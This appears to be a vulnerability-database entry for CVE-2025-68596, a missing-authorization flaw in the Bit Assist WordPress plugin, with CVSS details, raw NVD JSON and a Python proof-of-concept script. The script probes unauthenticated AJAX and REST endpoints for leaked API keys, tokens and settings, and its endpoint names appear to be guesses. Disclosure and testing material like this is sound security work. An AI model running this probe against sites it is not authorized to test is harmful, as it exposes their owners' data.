Security Vulnerability Report
中文
CVE-2025-68596 CVSS 5.3 MEDIUM

CVE-2025-68596

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35

Description

Missing Authorization vulnerability in Bit Apps Bit Assist bit-assist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bit Assist: from n/a through <= 1.5.11.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Bit Assist <= 1.5.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68596 PoC - Bit Assist Missing Authorization # Description: Exploiting broken access control in Bit Assist plugin <= 1.5.11 # This PoC demonstrates accessing protected plugin functionality without authentication import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-68596 Tests multiple potential endpoints for missing authorization """ # Test endpoints that should require authentication endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/bit-assist/v1/config", f"{TARGET_URL}/wp-json/bit-assist/v1/chats", f"{TARGET_URL}/wp-json/bit-assist/v1/settings" ] print("[*] Testing Bit Assist plugin for Missing Authorization vulnerability...") print(f"[*] Target: {TARGET_URL}") print("-" * 60) for endpoint in endpoints: print(f"\n[+] Testing endpoint: {endpoint}") # Test with unauthenticated request try: # AJAX endpoint test if "admin-ajax.php" in endpoint: response = requests.post( endpoint, data={ "action": "bit_assist_get_config", "_wpnonce": "" # No nonce provided }, timeout=10, verify=False ) else: # REST API endpoint test response = requests.get( endpoint, timeout=10, verify=False ) print(f" Status Code: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") # Check if we got unexpected access if response.status_code == 200 and len(response.text) > 0: # Check for sensitive data in response sensitive_keywords = ["api_key", "token", "config", "settings", "chat"] for keyword in sensitive_keywords: if keyword.lower() in response.text.lower(): print(f" [!] VULNERABLE: Found sensitive keyword '{keyword}' in response!") print(f" [!] Response preview: {response.text[:500]}...") return True except requests.RequestException as e: print(f" [!] Request failed: {str(e)}") print("\n[-] No obvious vulnerability detected") return False def main(): if len(sys.argv) > 1: global TARGET_URL TARGET_URL = sys.argv[1] if check_vulnerability(): print("\n[!] Target is VULNERABLE to CVE-2025-68596") print("[!] Recommendation: Update Bit Assist to latest version") else: print("\n[*] Target may not be vulnerable or Bit Assist is not installed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68596", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:27.053", "lastModified": "2026-04-27T19:16:35.273", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Bit Apps Bit Assist bit-assist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bit Assist: from n/a through <= 1.5.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bit-assist/vulnerability/wordpress-bit-assist-plugin-1-5-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}